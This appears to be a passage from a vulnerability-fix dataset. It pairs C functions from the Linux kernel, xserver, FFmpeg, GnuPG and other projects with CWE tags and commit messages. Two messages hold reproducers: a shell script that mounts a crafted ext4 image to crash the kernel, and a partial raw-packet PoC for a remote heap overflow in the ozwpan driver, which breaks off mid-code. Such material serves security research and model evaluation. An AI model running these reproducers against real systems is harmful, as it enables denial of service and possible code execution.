246d8ae0cef27377e5dfe9ee3ad87e864d6b6266
| 94,218,656,136,403,260,000,000,000,000,000,000,000 | 11 |
[misc] Fix use-after-free in net_bind()
Thanks to Ba Jinsheng for reporting this bug
|
void analyzeUnitTest() {
struct ndpi_analyze_struct *s = ndpi_alloc_data_analysis(32);
u_int32_t i;
for(i=0; i<256; i++) {
ndpi_data_add_value(s, rand()*i);
// ndpi_data_add_value(s, i+1);
}
// ndpi_data_print_window_values(s);
#ifdef RUN_DATA_ANALYSIS_THEN_QUIT
printf("Average: [all: %f][window: %f]\n",
ndpi_data_average(s), ndpi_data_window_average(s));
printf("Entropy: %f\n", ndpi_data_entropy(s));
printf("Min/Max: %u/%u\n",
ndpi_data_min(s), ndpi_data_max(s));
#endif
ndpi_free_data_analysis(s);
#ifdef RUN_DATA_ANALYSIS_THEN_QUIT
exit(0);
#endif
}
| 0 |
[
"CWE-125"
] |
nDPI
|
b7e666e465f138ae48ab81976726e67deed12701
| 144,595,143,454,073,900,000,000,000,000,000,000,000 | 26 |
Added fix to avoid potential heap buffer overflow in H.323 dissector
Modified HTTP report information to make it closer to the HTTP field names
|
static int wcd9335_hw_params(struct snd_pcm_substream *substream,
struct snd_pcm_hw_params *params,
struct snd_soc_dai *dai)
{
struct wcd9335_codec *wcd;
int ret, tx_fs_rate = 0;
wcd = snd_soc_component_get_drvdata(dai->component);
switch (substream->stream) {
case SNDRV_PCM_STREAM_PLAYBACK:
ret = wcd9335_set_interpolator_rate(dai, params_rate(params));
if (ret) {
dev_err(wcd->dev, "cannot set sample rate: %u\n",
params_rate(params));
return ret;
}
switch (params_width(params)) {
case 16 ... 24:
wcd->dai[dai->id].sconfig.bps = params_width(params);
break;
default:
dev_err(wcd->dev, "%s: Invalid format 0x%x\n",
__func__, params_width(params));
return -EINVAL;
}
break;
case SNDRV_PCM_STREAM_CAPTURE:
switch (params_rate(params)) {
case 8000:
tx_fs_rate = 0;
break;
case 16000:
tx_fs_rate = 1;
break;
case 32000:
tx_fs_rate = 3;
break;
case 48000:
tx_fs_rate = 4;
break;
case 96000:
tx_fs_rate = 5;
break;
case 192000:
tx_fs_rate = 6;
break;
case 384000:
tx_fs_rate = 7;
break;
default:
dev_err(wcd->dev, "%s: Invalid TX sample rate: %d\n",
__func__, params_rate(params));
return -EINVAL;
};
ret = wcd9335_set_decimator_rate(dai, tx_fs_rate,
params_rate(params));
if (ret < 0) {
dev_err(wcd->dev, "Cannot set TX Decimator rate\n");
return ret;
}
switch (params_width(params)) {
case 16 ... 32:
wcd->dai[dai->id].sconfig.bps = params_width(params);
break;
default:
dev_err(wcd->dev, "%s: Invalid format 0x%x\n",
__func__, params_width(params));
return -EINVAL;
};
break;
default:
dev_err(wcd->dev, "Invalid stream type %d\n",
substream->stream);
return -EINVAL;
};
wcd->dai[dai->id].sconfig.rate = params_rate(params);
wcd9335_slim_set_hw_params(wcd, &wcd->dai[dai->id], substream->stream);
return 0;
}
| 0 |
[] |
sound
|
a54988113985ca22e414e132054f234fc8a92604
| 75,838,589,309,107,250,000,000,000,000,000,000,000 | 85 |
wcd9335: fix an incorrect use of kstrndup()
In wcd9335_codec_enable_dec(), 'widget_name' is allocated by kstrndup().
However, according to doc: "Note: Use kmemdup_nul() instead if the size
is known exactly." So we should use kmemdup_nul() here instead of
kstrndup().
Signed-off-by: Gen Zhang <[email protected]>
Signed-off-by: Mark Brown <[email protected]>
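Illustratively (the length constant and error handling are assumptions), the substitution is a fragment of the form:
/* Before: kstrndup() re-scans the string even though the size is known.
 *	widget_name = kstrndup(w->name, 15, GFP_KERNEL);
 * After, as the commit suggests: */
widget_name = kmemdup_nul(w->name, 15, GFP_KERNEL);
if (!widget_name)
	return -ENOMEM;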
|
int mnt_fs_get_propagation(struct libmnt_fs *fs, unsigned long *flags)
{
if (!fs || !flags)
return -EINVAL;
*flags = 0;
if (!fs->opt_fields)
return 0;
/*
* The optional fields format is incompatible with mount options
* ... we have to parse the field here.
*/
*flags |= strstr(fs->opt_fields, "shared:") ? MS_SHARED : MS_PRIVATE;
if (strstr(fs->opt_fields, "master:"))
*flags |= MS_SLAVE;
if (strstr(fs->opt_fields, "unbindable"))
*flags |= MS_UNBINDABLE;
return 0;
}
| 0 |
[
"CWE-552",
"CWE-703"
] |
util-linux
|
166e87368ae88bf31112a30e078cceae637f4cdb
| 259,780,183,560,905,580,000,000,000,000,000,000,000 | 23 |
libmount: remove support for deleted mount table entries
The "(deleted)" suffix has been originally used by kernel for deleted
mountpoints. Since kernel commit 9d4d65748a5ca26ea8650e50ba521295549bf4e3
(Dec 2014) kernel does not use this suffix for mount stuff in /proc at
all. Let's remove this support from libmount too.
Signed-off-by: Karel Zak <[email protected]>
|
XISendDeviceHierarchyEvent(int flags[MAXDEVICES])
{
xXIHierarchyEvent *ev;
xXIHierarchyInfo *info;
DeviceIntRec dummyDev;
DeviceIntPtr dev;
int i;
if (!flags)
return;
ev = calloc(1, sizeof(xXIHierarchyEvent) +
MAXDEVICES * sizeof(xXIHierarchyInfo));
if (!ev)
return;
ev->type = GenericEvent;
ev->extension = IReqCode;
ev->evtype = XI_HierarchyChanged;
ev->time = GetTimeInMillis();
ev->flags = 0;
ev->num_info = inputInfo.numDevices;
info = (xXIHierarchyInfo *) &ev[1];
for (dev = inputInfo.devices; dev; dev = dev->next) {
info->deviceid = dev->id;
info->enabled = dev->enabled;
info->use = GetDeviceUse(dev, &info->attachment);
info->flags = flags[dev->id];
ev->flags |= info->flags;
info++;
}
for (dev = inputInfo.off_devices; dev; dev = dev->next) {
info->deviceid = dev->id;
info->enabled = dev->enabled;
info->use = GetDeviceUse(dev, &info->attachment);
info->flags = flags[dev->id];
ev->flags |= info->flags;
info++;
}
for (i = 0; i < MAXDEVICES; i++) {
if (flags[i] & (XIMasterRemoved | XISlaveRemoved)) {
info->deviceid = i;
info->enabled = FALSE;
info->flags = flags[i];
info->use = 0;
ev->flags |= info->flags;
ev->num_info++;
info++;
}
}
ev->length = bytes_to_int32(ev->num_info * sizeof(xXIHierarchyInfo));
memset(&dummyDev, 0, sizeof(dummyDev));
dummyDev.id = XIAllDevices;
dummyDev.type = SLAVE;
SendEventToAllWindows(&dummyDev, (XI_HierarchyChangedMask >> 8),
(xEvent *) ev, 1);
free(ev);
}
| 0 |
[
"CWE-191"
] |
xserver
|
c940cc8b6c0a2983c1ec974f1b3f019795dd4cff
| 141,164,826,481,603,020,000,000,000,000,000,000,000 | 61 |
Fix XIChangeHierarchy() integer underflow
CVE-2020-14346 / ZDI-CAN-11429
This vulnerability was discovered by:
Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
Signed-off-by: Matthieu Herrb <[email protected]>
|
void X509_STORE_CTX_set_time(X509_STORE_CTX *ctx, unsigned long flags, time_t t)
{
X509_VERIFY_PARAM_set_time(ctx->param, t);
}
| 0 |
[] |
openssl
|
d65b8b2162f33ac0d53dace588a0847ed827626c
| 93,473,631,747,698,120,000,000,000,000,000,000,000 | 4 |
Backport OCSP fixes.
|
ex_print(exarg_T *eap)
{
if (curbuf->b_ml.ml_flags & ML_EMPTY)
emsg(_(e_emptybuf));
else
{
for ( ;!got_int; ui_breakcheck())
{
print_line(eap->line1,
(eap->cmdidx == CMD_number || eap->cmdidx == CMD_pound
|| (eap->flags & EXFLAG_NR)),
eap->cmdidx == CMD_list || (eap->flags & EXFLAG_LIST));
if (++eap->line1 > eap->line2)
break;
out_flush(); // show one line at a time
}
setpcmark();
// put cursor at last line
curwin->w_cursor.lnum = eap->line2;
beginline(BL_SOL | BL_FIX);
}
ex_no_reprint = TRUE;
}
| 0 |
[
"CWE-122"
] |
vim
|
35a319b77f897744eec1155b736e9372c9c5575f
| 38,178,703,785,104,603,000,000,000,000,000,000,000 | 24 |
patch 8.2.3489: ml_get error after search with range
Problem: ml_get error after search with range.
Solution: Limit the line number to the buffer line count.
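The clamp described in the solution is essentially a one-liner against Vim's buffer fields; as a sketch:
/* Keep the computed range inside the buffer before printing it. */
if (eap->line2 > curbuf->b_ml.ml_line_count)
    eap->line2 = curbuf->b_ml.ml_line_count;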
|
test_bson_copy_to_excluding_noinit (void)
{
bson_iter_t iter;
bool r;
bson_t b;
bson_t c;
int i;
bson_init (&b);
bson_append_int32 (&b, "a", 1, 1);
bson_append_int32 (&b, "b", 1, 2);
bson_init (&c);
bson_copy_to_excluding_noinit (&b, &c, "b", NULL);
r = bson_iter_init_find (&iter, &c, "a");
BSON_ASSERT (r);
r = bson_iter_init_find (&iter, &c, "b");
BSON_ASSERT (!r);
i = bson_count_keys (&b);
BSON_ASSERT_CMPINT (i, ==, 2);
i = bson_count_keys (&c);
BSON_ASSERT_CMPINT (i, ==, 1);
bson_destroy (&b);
bson_destroy (&c);
}
| 0 |
[
"CWE-125"
] |
libbson
|
42900956dc461dfe7fb91d93361d10737c1602b3
| 207,305,990,399,515,100,000,000,000,000,000,000,000 | 28 |
CDRIVER-2269 Check for zero string length in codewscope
|
static int ext4_check_descriptors(struct super_block *sb,
ext4_fsblk_t sb_block,
ext4_group_t *first_not_zeroed)
{
struct ext4_sb_info *sbi = EXT4_SB(sb);
ext4_fsblk_t first_block = le32_to_cpu(sbi->s_es->s_first_data_block);
ext4_fsblk_t last_block;
ext4_fsblk_t block_bitmap;
ext4_fsblk_t inode_bitmap;
ext4_fsblk_t inode_table;
int flexbg_flag = 0;
ext4_group_t i, grp = sbi->s_groups_count;
if (ext4_has_feature_flex_bg(sb))
flexbg_flag = 1;
ext4_debug("Checking group descriptors");
for (i = 0; i < sbi->s_groups_count; i++) {
struct ext4_group_desc *gdp = ext4_get_group_desc(sb, i, NULL);
if (i == sbi->s_groups_count - 1 || flexbg_flag)
last_block = ext4_blocks_count(sbi->s_es) - 1;
else
last_block = first_block +
(EXT4_BLOCKS_PER_GROUP(sb) - 1);
if ((grp == sbi->s_groups_count) &&
!(gdp->bg_flags & cpu_to_le16(EXT4_BG_INODE_ZEROED)))
grp = i;
block_bitmap = ext4_block_bitmap(sb, gdp);
if (block_bitmap == sb_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Block bitmap for group %u overlaps "
"superblock", i);
}
if (block_bitmap < first_block || block_bitmap > last_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Block bitmap for group %u not in group "
"(block %llu)!", i, block_bitmap);
return 0;
}
inode_bitmap = ext4_inode_bitmap(sb, gdp);
if (inode_bitmap == sb_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode bitmap for group %u overlaps "
"superblock", i);
}
if (inode_bitmap < first_block || inode_bitmap > last_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode bitmap for group %u not in group "
"(block %llu)!", i, inode_bitmap);
return 0;
}
inode_table = ext4_inode_table(sb, gdp);
if (inode_table == sb_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode table for group %u overlaps "
"superblock", i);
}
if (inode_table < first_block ||
inode_table + sbi->s_itb_per_group - 1 > last_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode table for group %u not in group "
"(block %llu)!", i, inode_table);
return 0;
}
ext4_lock_group(sb, i);
if (!ext4_group_desc_csum_verify(sb, i, gdp)) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Checksum for group %u failed (%u!=%u)",
i, le16_to_cpu(ext4_group_desc_csum(sb, i,
gdp)), le16_to_cpu(gdp->bg_checksum));
if (!(sb->s_flags & MS_RDONLY)) {
ext4_unlock_group(sb, i);
return 0;
}
}
ext4_unlock_group(sb, i);
if (!flexbg_flag)
first_block += EXT4_BLOCKS_PER_GROUP(sb);
}
if (NULL != first_not_zeroed)
*first_not_zeroed = grp;
return 1;
}
| 0 |
[
"CWE-125"
] |
linux
|
3a4b77cd47bb837b8557595ec7425f281f2ca1fe
| 50,693,497,686,709,500,000,000,000,000,000,000,000 | 87 |
ext4: validate s_first_meta_bg at mount time
Ralf Spenneberg reported that he hit a kernel crash when mounting a
modified ext4 image. And it turns out that kernel crashed when
calculating fs overhead (ext4_calculate_overhead()), this is because
the image has very large s_first_meta_bg (debug code shows it's
842150400), and ext4 overruns the memory in count_overhead() when
setting bitmap buffer, which is PAGE_SIZE.
ext4_calculate_overhead():
buf = get_zeroed_page(GFP_NOFS); <=== PAGE_SIZE buffer
blks = count_overhead(sb, i, buf);
count_overhead():
for (j = ext4_bg_num_gdb(sb, grp); j > 0; j--) { <=== j = 842150400
ext4_set_bit(EXT4_B2C(sbi, s++), buf); <=== buffer overrun
count++;
}
This can be reproduced easily for me by this script:
#!/bin/bash
rm -f fs.img
mkdir -p /mnt/ext4
fallocate -l 16M fs.img
mke2fs -t ext4 -O bigalloc,meta_bg,^resize_inode -F fs.img
debugfs -w -R "ssv first_meta_bg 842150400" fs.img
mount -o loop fs.img /mnt/ext4
Fix it by validating s_first_meta_bg first at mount time, and
refusing to mount if its value exceeds the largest possible meta_bg
number.
Reported-by: Ralf Spenneberg <[email protected]>
Signed-off-by: Eryu Guan <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
Reviewed-by: Andreas Dilger <[email protected]>
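The mount-time validation amounts to a range check; a sketch (with db_count standing for the number of group-descriptor blocks already computed during mount):
if (ext4_has_feature_meta_bg(sb) &&
    le32_to_cpu(es->s_first_meta_bg) > db_count) {
	ext4_msg(sb, KERN_WARNING,
		 "first meta block group too large: %u (group descriptor block count %u)",
		 le32_to_cpu(es->s_first_meta_bg), db_count);
	goto failed_mount;
}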
|
TEST_METHOD(10) {
// A Generation object returned by getNewestGeneration() doesn't delete
// the associated generation directory upon destruction.
ServerInstanceDir dir(parentDir + "/passenger-test.1234");
ServerInstanceDir::GenerationPtr generation = dir.newGeneration(true, "nobody", nobodyGroup, 0, 0);
ServerInstanceDir::GenerationPtr newestGeneration = dir.getNewestGeneration();
newestGeneration.reset();
ensure_equals(getFileType(generation->getPath()), FT_DIRECTORY);
}
| 0 |
[
"CWE-59",
"CWE-61"
] |
passenger
|
5483b3292cc2af1c83033eaaadec20dba4dcfd9b
| 52,161,328,329,777,700,000,000,000,000,000,000,000 | 9 |
If the server instance directory already exists, it is now removed first in order to get correct directory permissions.
If the directory still exists after removal, Phusion Passenger aborts to avoid writing to a directory with unexpected permissions.
Fixes issue #910.
|
static int decode_frame(AVCodecContext *avctx, void *data, int *got_frame,
AVPacket *avpkt)
{
AVFrame *pic = data;
const uint8_t *src = avpkt->data;
int ret;
if (avpkt->size < 16) {
av_log(avctx, AV_LOG_ERROR, "packet too small\n");
return AVERROR_INVALIDDATA;
}
switch (AV_RB32(src)) {
case 0x01000001:
ret = dxtory_decode_v1_rgb(avctx, pic, src + 16, avpkt->size - 16,
AV_PIX_FMT_BGR24, 3);
break;
case 0x01000009:
ret = dxtory_decode_v2_rgb(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x02000001:
ret = dxtory_decode_v1_420(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x02000009:
ret = dxtory_decode_v2_420(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x03000001:
ret = dxtory_decode_v1_410(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x03000009:
ret = dxtory_decode_v2_410(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x04000001:
ret = dxtory_decode_v1_444(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x04000009:
ret = dxtory_decode_v2_444(avctx, pic, src + 16, avpkt->size - 16);
break;
case 0x17000001:
ret = dxtory_decode_v1_rgb(avctx, pic, src + 16, avpkt->size - 16,
AV_PIX_FMT_RGB565LE, 2);
break;
case 0x17000009:
ret = dxtory_decode_v2_565(avctx, pic, src + 16, avpkt->size - 16, 1);
break;
case 0x18000001:
case 0x19000001:
ret = dxtory_decode_v1_rgb(avctx, pic, src + 16, avpkt->size - 16,
AV_PIX_FMT_RGB555LE, 2);
break;
case 0x18000009:
case 0x19000009:
ret = dxtory_decode_v2_565(avctx, pic, src + 16, avpkt->size - 16, 0);
break;
default:
avpriv_request_sample(avctx, "Frame header %X", AV_RB32(src));
return AVERROR_PATCHWELCOME;
}
if (ret)
return ret;
pic->pict_type = AV_PICTURE_TYPE_I;
pic->key_frame = 1;
*got_frame = 1;
return avpkt->size;
}
| 0 |
[
"CWE-190"
] |
FFmpeg
|
a392bf657015c9a79a5a13adfbfb15086c1943b9
| 336,721,304,930,090,820,000,000,000,000,000,000,000 | 68 |
avcodec/dxtory: fix src size checks
Fixes integer overflow
Fixes out of array read
Fixes: d104661bb59b202df7671fb19a00ca6c-asan_heap-oob_d6429d_5066_cov_1729501105_dxtory_mic.avi
Found-by: Mateusz "j00ru" Jurczyk and Gynvael Coldwind
Signed-off-by: Michael Niedermayer <[email protected]>
|
static int uvesafb_helper_start(void)
{
char *envp[] = {
"HOME=/",
"PATH=/sbin:/bin",
NULL,
};
char *argv[] = {
v86d_path,
NULL,
};
return call_usermodehelper(v86d_path, argv, envp, UMH_WAIT_PROC);
}
| 0 |
[
"CWE-190"
] |
linux
|
9f645bcc566a1e9f921bdae7528a01ced5bc3713
| 50,823,883,515,396,070,000,000,000,000,000,000,000 | 15 |
video: uvesafb: Fix integer overflow in allocation
cmap->len can get close to INT_MAX/2, allowing for an integer overflow in
allocation. This uses kmalloc_array() instead to catch the condition.
Reported-by: Dr Silvio Cesare of InfoSect <[email protected]>
Fixes: 8bdb3a2d7df48 ("uvesafb: the driver core")
Cc: [email protected]
Signed-off-by: Kees Cook <[email protected]>
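A sketch of the substitution (variable names are illustrative):
/* Before: cmap->len * sizeof(*entries) can wrap for len near INT_MAX/2.
 *	entries = kmalloc(cmap->len * sizeof(*entries), GFP_KERNEL);
 * After: kmalloc_array() detects the overflow and fails cleanly. */
entries = kmalloc_array(cmap->len, sizeof(*entries), GFP_KERNEL);
if (!entries)
	return -ENOMEM;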
|
nfsd4_read(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
struct nfsd4_read *read)
{
__be32 status;
read->rd_filp = NULL;
if (read->rd_offset >= OFFSET_MAX)
return nfserr_inval;
/*
* If we do a zero copy read, then a client will see read data
* that reflects the state of the file *after* performing the
* following compound.
*
* To ensure proper ordering, we therefore turn off zero copy if
* the client wants us to do more in this compound:
*/
if (!nfsd4_last_compound_op(rqstp))
clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
/* check stateid */
status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
&read->rd_stateid, RD_STATE,
&read->rd_filp, &read->rd_tmp_file);
if (status) {
dprintk("NFSD: nfsd4_read: couldn't process stateid!\n");
goto out;
}
status = nfs_ok;
out:
read->rd_rqstp = rqstp;
read->rd_fhp = &cstate->current_fh;
return status;
}
| 0 |
[
"CWE-20",
"CWE-129"
] |
linux
|
b550a32e60a4941994b437a8d662432a486235a5
| 254,355,203,148,609,500,000,000,000,000,000,000,000 | 34 |
nfsd: fix undefined behavior in nfsd4_layout_verify
UBSAN: Undefined behaviour in fs/nfsd/nfs4proc.c:1262:34
shift exponent 128 is too large for 32-bit type 'int'
Depending on compiler+architecture, this may cause the check for
layout_type to succeed for overly large values (which seems to be the
case with amd64). The large value will be later used in de-referencing
nfsd4_layout_ops for function pointers.
Reported-by: Jani Tuovila <[email protected]>
Signed-off-by: Ari Kauppi <[email protected]>
[[email protected]: use LAYOUT_TYPE_MAX instead of 32]
Cc: [email protected]
Reviewed-by: Dan Carpenter <[email protected]>
Reviewed-by: Christoph Hellwig <[email protected]>
Signed-off-by: J. Bruce Fields <[email protected]>
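The fix reduces to bounding the index before it is used as a shift amount; sketched with a hypothetical helper:
static bool layout_type_valid(u32 layout_type, u32 supported_mask)
{
	/* A shift by 32 or more is undefined behaviour (the UBSAN report)
	 * and would also index past nfsd4_layout_ops[]. */
	if (layout_type >= LAYOUT_TYPE_MAX)
		return false;
	return (supported_mask & (1u << layout_type)) != 0;
}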
|
TfLiteQuantizationParams GetLegacyQuantization(
const TfLiteQuantization& quantization) {
TfLiteQuantizationParams legacy_quantization;
legacy_quantization.scale = 0;
legacy_quantization.zero_point = 0;
// If the quantization type isn't affine, return the empty
// legacy_quantization.
if (quantization.type != kTfLiteAffineQuantization) {
return legacy_quantization;
}
auto* affine_quantization =
static_cast<TfLiteAffineQuantization*>(quantization.params);
if (!affine_quantization || !affine_quantization->scale ||
!affine_quantization->zero_point ||
affine_quantization->scale->size != 1 ||
affine_quantization->zero_point->size != 1) {
return legacy_quantization;
}
// We know its per-layer quantization now.
legacy_quantization.scale = affine_quantization->scale->data[0];
legacy_quantization.zero_point = affine_quantization->zero_point->data[0];
return legacy_quantization;
}
| 0 |
[
"CWE-20",
"CWE-787"
] |
tensorflow
|
d58c96946b2880991d63d1dacacb32f0a4dfa453
| 148,341,659,251,077,360,000,000,000,000,000,000,000 | 26 |
[tflite] Ensure inputs and outputs don't overlap.
If a model uses the same tensor for both an input and an output then this can result in data loss and memory corruption. This should not happen.
PiperOrigin-RevId: 332522916
Change-Id: If0905b142415a9dfceaf2d181872f2a8fb88f48a
|
pubkey_string (PKT_public_key *pk, char *buffer, size_t bufsize)
{
const char *prefix = NULL;
if (opt.legacy_list_mode)
{
snprintf (buffer, bufsize, "%4u%c",
nbits_from_pk (pk), pubkey_letter (pk->pubkey_algo));
return buffer;
}
switch (pk->pubkey_algo)
{
case PUBKEY_ALGO_RSA:
case PUBKEY_ALGO_RSA_E:
case PUBKEY_ALGO_RSA_S: prefix = "rsa"; break;
case PUBKEY_ALGO_ELGAMAL_E: prefix = "elg"; break;
case PUBKEY_ALGO_DSA: prefix = "dsa"; break;
case PUBKEY_ALGO_ELGAMAL: prefix = "xxx"; break;
case PUBKEY_ALGO_ECDH:
case PUBKEY_ALGO_ECDSA:
case PUBKEY_ALGO_EDDSA: prefix = ""; break;
}
if (prefix && *prefix)
snprintf (buffer, bufsize, "%s%u", prefix, nbits_from_pk (pk));
else if (prefix)
{
char *curve = openpgp_oid_to_str (pk->pkey[0]);
const char *name = openpgp_oid_to_curve (curve);
if (*name && *name != '?')
snprintf (buffer, bufsize, "%s", name);
else if (curve)
snprintf (buffer, bufsize, "E_%s", curve);
else
snprintf (buffer, bufsize, "E_error");
xfree (curve);
}
else
snprintf (buffer, bufsize, "unknown_%u", (unsigned int)pk->pubkey_algo);
return buffer;
}
| 0 |
[
"CWE-20"
] |
gnupg
|
2183683bd633818dd031b090b5530951de76f392
| 49,937,061,578,446,130,000,000,000,000,000,000,000 | 44 |
Use inline functions to convert buffer data to scalars.
* common/host2net.h (buf16_to_ulong, buf16_to_uint): New.
(buf16_to_ushort, buf16_to_u16): New.
(buf32_to_size_t, buf32_to_ulong, buf32_to_uint, buf32_to_u32): New.
--
Commit 91b826a38880fd8a989318585eb502582636ddd8 was not enough to
avoid all sign extension on shift problems. Hanno Böck found a case
with an invalid read due to this problem. To fix that once and for
all almost all uses of "<< 24" and "<< 8" are changed by this patch to
use an inline function from host2net.h.
Signed-off-by: Werner Koch <[email protected]>
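One of the new helpers, sketched along the lines of host2net.h:
static inline unsigned long
buf32_to_ulong (const void *buffer)
{
  const unsigned char *p = buffer;

  /* Promote each byte before shifting so "<< 24" can never sign-extend. */
  return (((unsigned long)p[0] << 24) | ((unsigned long)p[1] << 16)
          | ((unsigned long)p[2] << 8) | (unsigned long)p[3]);
}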
|
static int parse_txq_params(struct nlattr *tb[],
struct ieee80211_txq_params *txq_params)
{
if (!tb[NL80211_TXQ_ATTR_QUEUE] || !tb[NL80211_TXQ_ATTR_TXOP] ||
!tb[NL80211_TXQ_ATTR_CWMIN] || !tb[NL80211_TXQ_ATTR_CWMAX] ||
!tb[NL80211_TXQ_ATTR_AIFS])
return -EINVAL;
txq_params->queue = nla_get_u8(tb[NL80211_TXQ_ATTR_QUEUE]);
txq_params->txop = nla_get_u16(tb[NL80211_TXQ_ATTR_TXOP]);
txq_params->cwmin = nla_get_u16(tb[NL80211_TXQ_ATTR_CWMIN]);
txq_params->cwmax = nla_get_u16(tb[NL80211_TXQ_ATTR_CWMAX]);
txq_params->aifs = nla_get_u8(tb[NL80211_TXQ_ATTR_AIFS]);
return 0;
}
| 0 |
[
"CWE-362",
"CWE-119"
] |
linux
|
208c72f4fe44fe09577e7975ba0e7fa0278f3d03
| 252,636,950,755,671,120,000,000,000,000,000,000,000 | 16 |
nl80211: fix check for valid SSID size in scan operations
In both trigger_scan and sched_scan operations, we were checking for
the SSID length before assigning the value correctly. Since the
memory was just kzalloc'ed, the check was always failing and SSID with
over 32 characters were allowed to go through.
This was causing a buffer overflow when copying the actual SSID to the
proper place.
This bug has been there since 2.6.29-rc4.
Cc: [email protected]
Signed-off-by: Luciano Coelho <[email protected]>
Signed-off-by: John W. Linville <[email protected]>
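The shape of the fix, sketched (attribute iteration and error labels abbreviated, variable names assumed):
/* Validate the netlink attribute length before anything is copied. */
if (nla_len(attr) > IEEE80211_MAX_SSID_LEN) {
	err = -EINVAL;
	goto out_free;
}
request->ssids[i].ssid_len = nla_len(attr);
memcpy(request->ssids[i].ssid, nla_data(attr), nla_len(attr));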
|
bool test_r_str_split(void) {
char* hi = strdup ("hello world");
int r = r_str_split (hi, ' ');
mu_assert_eq (r, 2, "split on space");
char* hello = hi;
char* world = hi + 6;
mu_assert_streq (hello, "hello", "first string in split");
mu_assert_streq (world, "world", "second string in split");
free (hi);
mu_end;
}
| 0 |
[
"CWE-78"
] |
radare2
|
04edfa82c1f3fa2bc3621ccdad2f93bdbf00e4f9
| 310,006,023,020,054,320,000,000,000,000,000,000,000 | 11 |
Fix command injection on PDB download (#16966)
* Fix r_sys_mkdirp with absolute path on Windows
* Fix build with --with-openssl
* Use RBuffer in r_socket_http_answer()
* r_socket_http_answer: Fix read for big responses
* Implement r_str_escape_sh()
* Cleanup r_socket_connect() on Windows
* Fix socket being created without a protocol
* Fix socket connect with SSL ##socket
* Use select() in r_socket_ready()
* Fix read failing if received only protocol answer
* Fix double-free
* r_socket_http_get: Fail if req. SSL with no support
* Follow redirects in r_socket_http_answer()
* Fix r_socket_http_get result length with R2_CURL=1
* Also follow redirects
* Avoid using curl for downloading PDBs
* Use r_socket_http_get() on UNIXs
* Use WinINet API on Windows for r_socket_http_get()
* Fix command injection
* Fix r_sys_cmd_str_full output for binary data
* Validate GUID on PDB download
* Pass depth to socket_http_get_recursive()
* Remove 'r_' and '__' from static function names
* Fix is_valid_guid
* Fix for comments
|
static void oz_acquire_port(struct oz_port *port, void *hpd)
{
INIT_LIST_HEAD(&port->isoc_out_ep);
INIT_LIST_HEAD(&port->isoc_in_ep);
port->flags |= OZ_PORT_F_PRESENT | OZ_PORT_F_CHANGED;
port->status |= USB_PORT_STAT_CONNECTION |
(USB_PORT_STAT_C_CONNECTION << 16);
oz_usb_get(hpd);
port->hpd = hpd;
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
| 61,691,817,005,750,610,000,000,000,000,000,000,000 | 10 |
ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, so huge amounts of network-supplied
data are copied into the heap, which could potentially lead to remote
code execution. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
